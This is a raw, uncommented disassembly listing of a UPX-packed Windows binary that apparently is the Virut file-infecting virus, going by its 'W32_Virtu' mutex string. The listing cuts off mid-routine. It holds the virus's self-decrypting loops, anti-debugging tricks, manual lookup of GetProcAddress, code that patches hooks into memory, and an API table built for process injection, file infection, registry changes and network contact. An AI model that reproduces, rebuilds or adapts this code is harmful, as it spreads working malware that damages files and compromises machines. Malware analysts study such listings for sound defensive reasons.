dd 0A5D2EBC8h, 0E180D512h, 6FAA529Ah, 0FFDA37F6h, 9A2A8D14h
dd 8B12B9C8h, 0C3474A9Ah, 0DB9BAB9Eh, 0FF20A319h, 0ECFFFFEDh
dd 0BDDDA26Ch, 0DF9EED85h, 0EB81E8A2h, 0C8125544h, 2E961FBDh
dd 0D812EB8Dh, 584F9A85h, 125AFE68h, 5A9A099Dh, 0D096F810h
dd 76664922h, 7FFDDB7Bh, 8712FEFDh, 95C25AA9h, 82128502h
dd 0CB5A9104h, 0DA033FCDh, 857FCFF7h, 424D53FFh, 7FA51872h
dd 0C853C84Eh, 62FEFFh, 83435002h, 0FFFF1ADFh, 4F575445h
dd 50204B52h, 52474F52h, 31204D41h, 414C17CDh, 875A4D4Eh
dd 0A026B14h, 0B41566ABh, 0B795BADDh, 0BB676B03h, 330E7075h
dd 0B75BA5B0h, 4D27611Ah, 21583223h, 369A3232h, 2E32F953h
dd 2018D631h, 464A323Ch, 0A48BC19Eh, 0DF600773h, 0C62D42Eh
dd 40023FFh, 0D6140A11h, 20D8D46Eh, 69DBD405h, 244B4C00h
dd 53F443F8h, 97B75053h, 4AE00882h, 8F6FC0BBh, 6E240057h
dd 6F006400h, 3A730075h, 9B62F6F6h, 9013074h, 3500398Ch
dd 0B6E60323h, 72E1D44h, 7901DA00h, 8AB644Eh, 9C19DA20h
dd 9F579264h, 80F20003h, 46D8360Ch, 40074723h, 0F2373FFEh
dd 10060006h, 8A151F01h, 48E088h, 0EC44004Fh, 0FE88DFFFh
dd 0F27A6A19h, 281C49E4h, 742530AFh, 0E1536710h, 89BE429h
dd 7575DF5Ch, 30E5B5CDh, 75C0400h, 5C085ABDh, 0EEBB91B1h
dd 72E4D61h, 2E380036h, 6C4CD977h, 491B30BBh, 0E843EC00h
dd 0C8073F00h, 6463D873h, 0F90708A2h, 4DCCB6Fh, 0FF1640h
dd 0E00DEDEh, 19F1600h, 0B090984Dh, 28402602h, 0FBEE1A36h
dd 8B110319h, 0D374D96Ch, 65DF2170h, 9C2A9B0Dh, 9EC0256Bh
dd 109F4B6Dh, 1B04480Eh, 0EEBAEB6Eh, 5A541354h, 22596326h
dd 0F9A4C75Ch, 45CB7DCFh, 58765h, 4810030Bh, 1EF62FFFh
dd 0EB810B8h, 286A050Bh, 0B10C3919h, 0FF0B11D0h, 0A89BFF63h
dd 0D94FC000h, 5D5FF52Eh, 1CEB8A88h, 0E89F11C9h, 91732B3Ch
dd 4810ECBDh, 0F40CD160h, 21E460A3h, 0CA0E4AFh, 0CB10CA0h
dd 191C9DFh, 880CA000h, 3C230040h, 9F7C9h, 703ECh, 4F401495h
dd 36452F7Ch, 0BF4070D8h, 13430700h, 136447FEh, 138578h
dd 0E9A65BABh, 204E7813h, 2FF810CFh, 860EFEFFh, 23C6A2C1h
dd 8408BE40h, 0E93EE9Fh, 10B94388h, 0B801FFEEh, 93C9B310h
dd 0AD200C27h, 0AF2C070Dh, 0F7F0F90h, 700118D8h, 0F92BC87Ch
dd 0F840F84h
dd 0F2000F95h, 28037E4h, 6C0F847Fh, 3C25560Fh, 0A89A006Ch
dd 4460496Fh, 1F1343F6h, 0FE560536h, 50586E69h, 725020h
dd 227E4446h, 3901D9E4h, 123C6B32h, 6B027515h, 4149E420h
dd 941C0053h, 0D910E57Fh, 0C606EB01h, 0CB255C5Ch, 73FCDFFFh
dd 6370695Ch, 0EC816624h, 0E4FF071Ch, 44655300h, 67756265h
dd 0A8C7D169h, 678576A9h, 6A6441A7h, 64CDB775h, 6F5461BFh
dd 176E656Bh, 126F4C73h, 0EDFB7075h, 615624FEh, 4165756Ch
dd 28704F17h, 5224636Fh, 736C6A47h, 76430034h, 951B3F61h
dd 0E333C18Ah, 0DF6D4C79h, 29288168h, 545F1165h, 0A96D6172h
dd 5779C4AEh, 31431735h, 0DCEA1A61h, 6852A96Dh, 6854056Fh
dd 5B56140Ch, 73951ADBh, 284158DBh, 6B3D454Fh, 7778A99Bh
dd 47356E3Ah, 44B8F3F5h, 481E2FA3h, 7F505454h, 9532203Ch
dd 5797EF7Ah, 0D4B4F20h, 9F4B010Ah, 0ADDB56FBh, 4C2D0244h
dd 3A2D6704h, 18752520h, 3652C3DAh, 7954282Fh, 0D5B533B5h
dd 70A326D6h, 15836386h, 6AD4754Fh, 2DC7022Fh, 8C5A7293h
dd 9FC972B5h, 3D004757h, 2B151ADAh, 0E564F6F4h, 0D2BFDA16h
dd 6D8D73CBh, 0A9637673h, 5BBE77CBh, 0F1695A9Ch, 175F3203h
dd 3174D375h, 7B5E7D7h, 0E9363703h, 354D764Eh, 69331B34h
dd 0E4320333h, 31A696EBh, 38133930h, 4190373Bh, 7361B06h
dd 6413435h, 32336419h, 84D4AD31h, 0E77830D4h, 0ADCDC03Ah
dd 0AF67FFCAh, 54464F53h, 45524157h, 0F5694D5Ch, 0B62C1F86h
dd 0B35CCB6Fh, 7275435Ch, 1C580972h, 0D056B6EEh, 525CFE73h
dd 0FDD0B875h, 5576861Dh, 67279BF0h, 7264736Eh, 6E57796Ah
dd 6523B7B2h, 495300EEh, 96C305F2h, 6C0E57B0h, 6E6E8B39h
dd 57520AE5h, 534449EFh, 875C4320h, 673A01BBh, 17F57620h
dd 9EE64876h, 325CADBDh, 5320639Dh, 642C4410h, 1B65D92Fh
dd 3F23871Ah, 17B7337Eh, 73798312h, 0AC42004Ch, 3F1B1A35h
dd 233D9B20h, 8D6A1513h, 206D1B5Bh, 6D8E0654h, 3780C02Ch
dd 0EA20BC44h, 9EC96C66h, 6D672FBBh, 24632A9Ch, 0F6B11363h
dd 74690A2Fh, 614D2079h, 0DE1A1E6Eh, 0B08A6BA7h, 408BC400h
dd 1836DE32h, 65A846ECh, 80DDF90Ch, 470DDB1Bh, 876F4D53h
dd 0B7014665h, 4E6B374Dh, 1686D61h, 6372D36Ch, 0AE0BBDCEh
dd 70530A95h, 0C50A1979h, 4B724D2Eh, 4E326528h, 6C6C6F81h
dd 679A36D4h, 0CC538C70h, 0B5A688Ah, 191B2B52h, 7332129Ch
dd 0C715D4CDh, 358F540Fh, 0C2D8182Ch, 4E210580h, 0CF69747Ch
dd 612DB0F0h, 76455441h, 0B6DE6B33h, 26618585h, 3C535746h
dd 624F7B67h, 4335866Ah, 442C76D7h, 168D22F5h, 48198B9Ah
dd 0CFC83A0Bh, 0F7B25E48h, 0C645216h, 45E2447h, 8DB0EF7h
dd 5A61D26Eh, 0ACC2BBF0h, 4644E3A1h, 1479BC63h, 0B1B75BD8h
dd 492B1FB5h, 530F6F42h, 32DC6509h, 670B61Ch, 1C26C049h
dd 9B314564h, 0B328166Ch, 73D6366Eh, 0E0DC82C9h, 8DDA0B12h
dd 0CC8D623Fh, 694C2F0Fh, 0DAE0E62h, 0B5677B36h, 7C824D2Bh
dd 6AC04202h, 0B68ED513h, 0CFCD9ED0h, 81695463h, 25657588h
dd 0DEB0EBA1h, 3478E94Dh, 66CD92F6h, 0C45D0DD2h, 59843C39h
dd 5A624F84h, 4B527845h, 0DF31ACD8h, 0C1375E0Ah, 2D90B58Dh
dd 7B591B52h, 3C2ECD81h, 657A8608h, 0AD1BA738h, 154CC42Dh
dd 6FC3FC45h, 0FB3F3BD1h, 0A1673A26h, 4579654Bh, 4587610h
dd 0FC1869Ch, 0BD800A51h, 11F6B584h, 0B30E309Eh, 21E784D8h
dd 820E010h, 0C51F6EDh, 0BE6E6241h, 50A9A110h, 6E5504E4h
dd 9851AC06h, 7774632Dh, 0BF108936h, 0A17DB66h, 0E611244h
dd 1B66697Eh, 79B63AD6h, 758F67CAh, 6F6C362Bh, 0CE436F61h
dd 112C796Fh, 708D036Fh, 8F521067h, 0F90DD00Eh, 14B48F67h
dd 75716341h, 0E7057269h, 494D874Ah, 133AA035h, 9A7C336Dh
dd 7273ECDEh, 0B26D06CAh, 1CE18B16h, 0F920E35h, 9DA15B53h
dd 5F1D4DB9h, 5F3F5844h, 87033173h, 27F9F668h, 2CE20702h
dd 727911B4h, 6633E9AEh, 46C49AB9h, 361D514Dh, 274D01CCh
dd 14150E65h, 2E304C20h, 0BBB4E70Ah, 49DCB615h, 5708466h
dd 4F4166B1h, 669C620Eh, 5A0424F4h, 0F6D85B0h, 419B5585h
dd 0B0DC0E11h, 14671484h, 986E196Bh, 496E031Ah, 81745343h
dd 9632508Ch, 3C0D471Ah, 50D6CB2Ch, 2027375h, 2CB2010Dh
dd 6F39B2CBh, 0CA0C1734h, 9CB2CB2h, 16101304h, 0A41D5B3Fh
dd 96455036h, 40D5FD4Ch, 3A3E5F0Bh, 0B01E04Ah, 26120601h
dd 3B3D82C4h, 0B230E13h, 0BE8CB625h, 20B0756h, 0B99D074Ah
dd 0C506F65h, 8110341Eh, 781BD97h, 2CF40006h, 20376C9Bh
dd 7C648C64h, 76C11E01h, 552E2B8Fh, 90241607h, 0A92304DEh
dd 49F1726h, 0EC642EE0h, 0E13DD60Bh, 2BFB0FA7h, 0E259272Ah
dd 0C0162DD7h, 2A2EFC04h, 0C3h, 1200080h, 0FF00h, 5000BE60h
dd 0BE8D3160h, 0FFFFC000h, 0FFCD8357h, 909010EBh, 90909090h
dd 8846068Ah, 0DB014707h, 1E8B0775h, 11FCEE83h, 0B8ED72DBh
dd 1, 775DB01h, 0EE831E8Bh, 11DB11FCh, 73DB01C0h, 8B0975EFh
dd 0FCEE831Eh, 0E473DB11h, 0E883C931h, 0C10D7203h, 68A08E0h
dd 0FFF08346h, 0C5897474h, 775DB01h, 0EE831E8Bh, 11DB11FCh
dd 75DB01C9h, 831E8B07h, 0DB11FCEEh, 2075C911h, 75DB0141h
dd 831E8B07h, 0DB11FCEEh, 0DB01C911h, 975EF73h, 0EE831E8Bh
dd 73DB11FCh, 2C183E4h, 0F300FD81h, 0D183FFFFh, 2F148D01h
dd 76FCFD83h, 42028A0Fh, 49470788h, 63E9F775h, 90FFFFFFh
dd 0C283028Bh, 83078904h, 0E98304C7h, 1F17704h, 0FF4CE9CFh
dd 895EFFFFh, 7DB9F7h, 78A0000h, 3CE82C47h, 80F77701h
dd 0F275013Fh, 5F8A078Bh, 0E8C16604h, 10C0C108h, 0F829C486h
dd 1E8EB80h, 830789F0h, 0D88905C7h, 0BE8DD9E2h, 4000h
dd 0C009078Bh, 5F8B4574h, 30848D04h, 6000h, 8350F301h
dd 96FF08C7h, 608Ch, 47078A95h, 0DC74C008h, 779F989h, 4707B70Fh
dd 57B94750h, 55AEF248h, 609096FFh, 0C0090000h, 3890774h
dd 0EB04C383h, 9496FFD8h, 61000060h, 0FFB671E9h, 0FFh
dd 0D8h dup(0)
UPX1 ends
; Section 3. (virtual address 00007000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31607000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 70C4h, 708Ch, 3 dup(0)
dd 70D1h, 709Ch, 3 dup(0)
dd 70DEh, 70A4h, 3 dup(0)
dd 70E9h, 70ACh, 3 dup(0)
dd 70F4h, 70B4h, 3 dup(0)
dd 7100h, 70BCh, 5 dup(0)
dword_3160708C dd 77E805D8h ; DATA XREF: sub_31607292+2E�r
dd 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
dd 77C3528Dh, 0
dd 77D4C96Ah, 0
dd 7620AFB6h, 0
dd 71AB1A6Dh, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 5AE85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h, 40B60F30h, 0F88302h, 0E83D75h, 93000000h
dd 2AED815Dh, 8B004023h, 40237285h, 7A850300h, 8B004023h
dd 76858BF0h, 3004023h, 40237A85h, 0FE8B5000h, 32ACC933h
dd 40238285h, 3B41AA00h, 40237E8Dh, 0C3EF7C00h, 0FF64C02Bh
dd 20896430h, 345678B8h, 38712h, 40000050h, 6Bh, 316000h
dd 6000001Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_31607292
call sub_31607314
jmp loc_316072C6
start endp
; =============== S U B R O U T I N E =======================================
sub_31607292 proc near ; CODE XREF: start+3�p
; FUNCTION CHUNK AT 31607339 SIZE 0000000D BYTES
push dword ptr fs:0
mov fs:0, esp
xor edx, edx
push edx
push edx
push edx
push edx
push 10h
push 80000000h
push 100h
push 400h
push edx
push 800h
push edx
push edx
call ds:dword_3160708C ; LoadLibraryA
loc_316072C6: ; CODE XREF: start+D�j
sub eax, eax
loc_316072C8: ; CODE XREF: sub_31607292+3C�j
dec al
or al, al
jz short loc_316072D2
jnz short loc_316072C8
jmp short loc_31607339
; ---------------------------------------------------------------------------
loc_316072D2: ; CODE XREF: sub_31607292+3A�j
sub ebx, ebx
sub ecx, ecx
mov cl, 31h
loc_316072D8: ; CODE XREF: sub_31607292+48�j
inc ebx
dec ecx
jnz short loc_316072D8
call $+5
pop esi
add esi, 40h
push esi
sub edi, edi
xor edi, 243Ch
loc_316072F1: ; CODE XREF: sub_31607292+6B�j
xchg al, [esi]
sub ax, bx
xchg al, [esi]
inc esi
dec edi
cmp edi, 0
ja short loc_316072F1
pop esi
xchg ebp, fs:0
mov esp, ebp
pop dword ptr fs:0
lea ebp, [ebp+8]
leave
jmp esi
sub_31607292 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31607314 proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov ecx, [esp+arg_C]
xor eax, eax
pop dword ptr [ecx+0B8h]
retn
sub_31607314 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
dw 0E8h
dd 8B000000h, 80F72404h, 242Bh, 80000000h, 29AC9889h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31607292
loc_31607339: ; CODE XREF: sub_31607292+3E�j
add [ebx+7404245Ch], cl
sub eax, 0B08959FCh
mov al, 29h
; END OF FUNCTION CHUNK FOR sub_31607292
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_31607364
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_3160736C
; ---------------------------------------------------------------------------
loc_31607364: ; CODE XREF: UPX2:31607355�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_3160736C: ; CODE XREF: UPX2:31607362�j
pop ebx
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 127h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 0
rep movsb
loc_31607394: ; CODE XREF: UPX2:316073B0�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_316073AA
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_316073B2
loc_316073AA: ; CODE XREF: UPX2:3160739B�j
sub ebx, 100h
jnz short loc_31607394
loc_316073B2: ; CODE XREF: UPX2:316073A8�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_316073C0: ; CODE XREF: UPX2:loc_316073E7�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_316073E7
cmp dword ptr [eax+3], 636F7250h
jnz short loc_316073E7
cmp dword ptr [eax+7], 72646441h
jnz short loc_316073E7
cmp dword ptr [eax+0Bh], 737365h
jz short loc_316073EC
loc_316073E7: ; CODE XREF: UPX2:316073CA�j
; UPX2:316073D3�j ...
loop loc_316073C0
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_316073EC: ; CODE XREF: UPX2:316073E5�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_31607412+2
inc ebx
insb
outsd
jnb short near ptr loc_31607470+2
dec eax
popa
outsb
db 64h
insb
loc_31607412: ; CODE XREF: UPX2:31607403�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_3160742E+1
inc ebx
jb short near ptr loc_31607489+1
popa
jz short near ptr loc_31607489+4
inc ebp
jbe short near ptr loc_3160748F+1
outsb
jz short near ptr loc_3160746D+2
loc_3160742E: ; CODE XREF: UPX2:3160741D�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_3160744A
inc edi
db 65h
jz short near ptr loc_31607489+4
popa
jnb short loc_316074B8
inc ebp
jb short near ptr loc_316074B8+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_3160744A proc near ; CODE XREF: UPX2:31607438�p
; FUNCTION CHUNK AT 316074F3 SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 31607633 SIZE 0000013A BYTES
push ebx
call esi ; lstrcat
mov [ebp+403544h], eax
call sub_316074C8
test eax, eax
jz short loc_3160747D
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_31607477
lea eax, [ebp+4011D2h]
loc_3160746D: ; CODE XREF: UPX2:3160742C�j
mov dl, [eax-1]
loc_31607470: ; CODE XREF: UPX2:3160740B�j
call sub_316074E3
jmp short loc_316074F3
; ---------------------------------------------------------------------------
loc_31607477: ; CODE XREF: sub_3160744A+1B�j
; sub_3160744A+136�j ...
call dword ptr [ebp+40353Ch]
loc_3160747D: ; CODE XREF: sub_3160744A+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_316074A7
loc_31607489: ; CODE XREF: UPX2:31607423�j
; UPX2:31607426�j ...
lea esi, [ebp+403435h]
loc_3160748F: ; CODE XREF: UPX2:31607429�j
mov edi, [esp+4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_316074A7: ; CODE XREF: sub_3160744A+3D�j
pop ebp
retn
sub_3160744A endp
; ---------------------------------------------------------------------------
loc_316074A9: ; CODE XREF: sub_316074C8+2�p
; sub_3160744A:loc_316076B2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_316074B8: ; CODE XREF: UPX2:31607442�j
; UPX2:31607445�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
align 4
; =============== S U B R O U T I N E =======================================
sub_316074C8 proc near ; CODE XREF: sub_3160744A+9�p
xor ecx, ecx
call loc_316074A9
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_316074C8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_316074E3 proc near ; CODE XREF: sub_3160744A:loc_31607470�p
; sub_316092B7+25B�p
mov dh, dl
mov ecx, 225Fh
loc_316074EA: ; CODE XREF: sub_316074E3+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_316074EA
retn
sub_316074E3 endp
; ---------------------------------------------------------------------------
pop ecx
; START OF FUNCTION CHUNK FOR sub_3160744A
loc_316074F3: ; CODE XREF: sub_3160744A+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_3160751A: ; CODE XREF: sub_3160744A+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_3160751A
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_316078AD
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_31607633
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_31607477
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 0A74h
sub ebp, 401000h
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_3160744A
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+403550h]
add esp, 20h
test eax, eax
jz loc_31607477
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+403550h]
test eax, eax
jz loc_31607477
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+403550h]
push 1000Ah
call dword ptr [ebp+403550h]
call sub_31607623
jmp loc_31607477
; =============== S U B R O U T I N E =======================================
sub_31607623 proc near ; CODE XREF: UPX2:31607619�p
; sub_31607623+D�j
push 1
pop ecx
jecxz short locret_31607632
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_31607623
; ---------------------------------------------------------------------------
locret_31607632: ; CODE XREF: sub_31607623+3�j
retn
sub_31607623 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3160744A
loc_31607633: ; CODE XREF: sub_3160744A+10F�j
cmp dword ptr [ebp+403570h], 0
jz loc_31607477
call near ptr loc_3160764A+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_3160764A: ; CODE XREF: sub_3160744A+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_31607667+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_316078AD
loc_31607667: ; CODE XREF: sub_3160744A+209�j
cmp dword ptr [ebp+4035F8h], 0
jz loc_31607477
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, [ebp+4035E8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, [ebp+4035D8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_316076B2
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_316076B2: ; CODE XREF: sub_3160744A+25D�j
call loc_316074A9
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_316076F7: ; CODE XREF: sub_3160744A+2B0�j
lodsb
stosw
loop loc_316076F7
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_31607477
lea esi, [ebp+401000h]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, 401000h
lea eax, [ebp+40144Ch]
jmp eax
; END OF FUNCTION CHUNK FOR sub_3160744A
; ---------------------------------------------------------------------------
db 8Dh, 95h, 0E0h
db 18h
db 40h, 0, 52h
db 0FFh
db 95h, 9Ch, 35h
db 40h ; @
align 2
dw 16E8h
db 0
db 2 dup(0), 4Ch
aOokupprivilege db 'ookupPrivilegeValueA',0
db 50h, 0FFh, 95h
dd 403548h, 354C8589h, 54500040h, 0FF6A206Ah, 35EC95FFh
dd 0C0850040h, 963F755Fh, 5656026Ah, 16AD48Bh, 11E852h
dd 65530000h, 75626544h, 69725067h, 656C6976h, 56006567h
dd 354C95FFh, 0C48B0040h, 50565656h, 95FF5756h, 4035D0h
dd 5710C483h, 353C95FFh, 6A0040h, 95FF026Ah, 403570h, 128B9h
dd 0E12B9700h, 54240C89h, 0AC95FF57h, 33004035h, 3CA583F6h
dd 4036h, 95FF5754h, 4035B0h, 5C74C085h, 4FE8346h, 74FFEE72h
dd 6A0824h, 95FF2A6Ah, 4035A8h, 0DC74C085h, 43DE893h, 0C9330000h
dd 3930E391h, 40363C85h, 81287500h, 0DAEC1h, 50545000h
dd 50505156h, 6895FF53h, 85004035h, 0F7459C0h, 82474FFh
dd 363C858Fh, 0ACE80040h, 53FFFFFDh, 353C95FFh, 98EB0040h
dd 128C481h, 0FF570000h, 40353C95h, 0FBE5E900h, 498DFFFFh
dd 58585800h, 29CE00h, 0D6500h, 3 dup(0)
db 0
; =============== S U B R O U T I N E =======================================
sub_316078AD proc near ; CODE XREF: sub_3160744A+100�p
; sub_3160744A+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_316078B8: ; CODE XREF: sub_316078AD+E�j
lodsb
test al, al
jnz short loc_316078B8
loop sub_316078AD
retn
sub_316078AD endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_31607C48 proc near ; CODE XREF: sub_31607C7F+70�p
; sub_31607C7F+81�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_31607C48 endp
; =============== S U B R O U T I N E =======================================
sub_31607C7F proc near ; CODE XREF: UPX2:31609741�p
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_31607D2B
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
